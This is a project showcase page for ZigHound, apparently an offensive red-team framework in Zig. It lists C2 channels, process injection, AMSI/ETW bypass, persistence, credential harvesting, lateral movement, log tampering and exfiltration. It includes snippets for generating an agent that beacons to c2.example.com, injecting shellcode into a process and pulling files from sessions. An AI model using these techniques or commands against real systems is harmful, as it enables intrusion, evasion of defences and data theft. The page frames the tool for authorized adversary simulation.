Initializing Livey CyberDeck...
Loading intelligence modules...
Open Intelligence status: ONLINE
Livey Open Intelligence Engineer

ZigHound

Advanced red team framework in Zig. Reconnaissance with banner grabbing, stealth scanning (jitter + randomization), HTTP brute-force. C2 with XChaCha20-Poly1305 encryption, interactive shell, persistence (systemd/Registry). Post-exploitation PrivEsc audit, process injection, file exfiltration, tunneling.

View on GitHub

Tech Stack

Zig Red Team C2 Exploitation Reconnaissance Malware Development Stealth

Executive Summary

ZigHound pushes the boundaries of red team tooling by leveraging Zigโ€™s unique capabilities: compile-time code execution, cross-compilation simplicity, and C interoperability without the baggage. This framework provides operators with a lightweight, stealthy, and highly customizable platform for authorized penetration testing and adversary simulation.

Technical Architecture

Why Zig?

1. Compile-Time Code Generation

// Configuration baked into binary at compile time
const config = comptime blk: {
    var cfg = defaultConfig();
    cfg.c2_domain = obfuscateString("c2.example.com");
    cfg.beacon_interval = 300;
    break :blk cfg;
};

2. Zero Dependencies

  • No runtime linking
  • Single static binary
  • Minimal footprint (<500KB)
  • Reduced detection surface

3. Cross-Compilation

# Build for any target from any host
zig build -Dtarget=x86_64-windows-gnu
zig build -Dtarget=aarch64-linux-musl
zig build -Dtarget=x86_64-macos-none

Core Modules

1. C2 (Command & Control)

  • Protocols: HTTPS, DNS tunneling, ICMP covert channel
  • Encryption: AES-256-GCM with rotating keys
  • Jitter: Randomized beacon intervals (ยฑ30%)
  • Failover: Multiple C2 endpoints with priority

2. Agent

  • Injection: Process hollowing, APC injection, thread hijacking
  • Evasion: AMSI bypass, ETW patching, unhooking
  • Persistence: Registry run keys, scheduled tasks, WMI events
  • Discovery: System enumeration, network scanning, credential harvesting

3. Post-Exploitation

  • Privilege Escalation: Token impersonation, UAC bypass, kernel exploits
  • Lateral Movement: Pass-the-hash, Kerberoasting, DCOM/RPC
  • Data Exfiltration: Compressed, encrypted, chunked transfer
  • Cleanup: Artifact removal, log tampering, anti-forensics

Key Features

๐ŸŽฏ Stealth Capabilities

1. Syscall Direct Invocation

// Bypass user-mode hooks
const NtAllocateVirtualMemory = @ptrCast(
    *const fn (ProcessHandle: HANDLE, ...) callconv(.Stdcall) NTSTATUS,
    resolveSyscall("NtAllocateVirtualMemory")
);

2. String Obfuscation

  • XOR encryption at compile time
  • Stack allocation (no .data section)
  • Dynamic decryption on use

3. Anti-Analysis

  • Debugger detection (PEB.BeingDebugged, NtGlobalFlag)
  • VM/sandbox detection (CPUID, timing checks)
  • Process enumeration (blacklisted tools)

๐Ÿ“ก Communication Security

Protocol Stack

Application: Custom binary protocol
Encryption: AES-256-GCM + ECDH key exchange
Transport: HTTPS / DNS / ICMP
Obfuscation: Domain fronting, CDN routing

Beacon Profile

{
  "interval": 300,
  "jitter": 0.3,
  "user_agent": "Mozilla/5.0...",
  "headers": {
    "X-Custom-Header": "legitimate-looking-value"
  }
}

Installation

# Prerequisites
# - Zig 0.11+ 
# - Git

# Clone repository
git clone https://github.com/ind4skylivey/ZigHound.git
cd ZigHound

# Build all components
zig build -Drelease-safe

# Build specific target
zig build -Dtarget=x86_64-windows-gnu -Drelease-small

# Output binaries
# - zig-out/bin/agent
# - zig-out/bin/c2-server
# - zig-out/bin/operator-cli

Usage

1. Start C2 Server

./c2-server --config c2-config.toml

2. Generate Agent

./operator-cli generate \
  --c2 https://c2.example.com \
  --format exe \
  --output agent.exe

3. Deploy Agent

# Standard execution
./agent.exe

# In-memory execution (no disk artifact)
./operator-cli inject --pid 1234 --payload shellcode.bin

4. Operator CLI

# List active sessions
./operator-cli sessions

# Interact with session
./operator-cli interact --session 1

# Execute command
>>> shell whoami
>>> upload file.txt C:\\Windows\\Temp\\
>>> download C:\\secrets.txt .
>>> migrate --pid 5678

Configuration

# c2-config.toml
[server]
bind_address = "0.0.0.0:443"
certificate = "/path/to/cert.pem"
private_key = "/path/to/key.pem"

[beacon]
interval = 300
jitter = 0.3
max_retries = 5

[obfuscation]
enabled = true
technique = "domain_fronting"
front_domain = "cdn.cloudfront.net"

[logging]
level = "info"
file = "/var/log/zighound/c2.log"

OPSEC Considerations

Detection Evasion

  • Signature Evasion: Polymorphic code generation
  • Behavioral Evasion: Living-off-the-land techniques
  • Network Evasion: Protocol mimicry, legitimate domains

โš ๏ธ WARNING: This tool is for authorized security testing only.

  • Always have written authorization
  • Respect scope boundaries
  • Follow responsible disclosure
  • Comply with local laws

Roadmap

  • v1.0: Stable C2 protocol
  • v1.5: macOS and Linux agents
  • v2.0: mTLS authentication
  • v2.5: Blockchain-based C2
  • v3.0: AI-powered evasion

Research and Development

This project contributes to:

  • Adversary simulation methodologies
  • EDR/AV evasion techniques
  • Secure C2 protocol design
  • Memory-safe offensive tooling

License

GPL-3.0 - For research and authorized testing only

โš ๏ธ Disclaimer: Use only on systems you own or have explicit permission to test.

>
Navigate: โ†‘โ†“ Select: Enter Close: Esc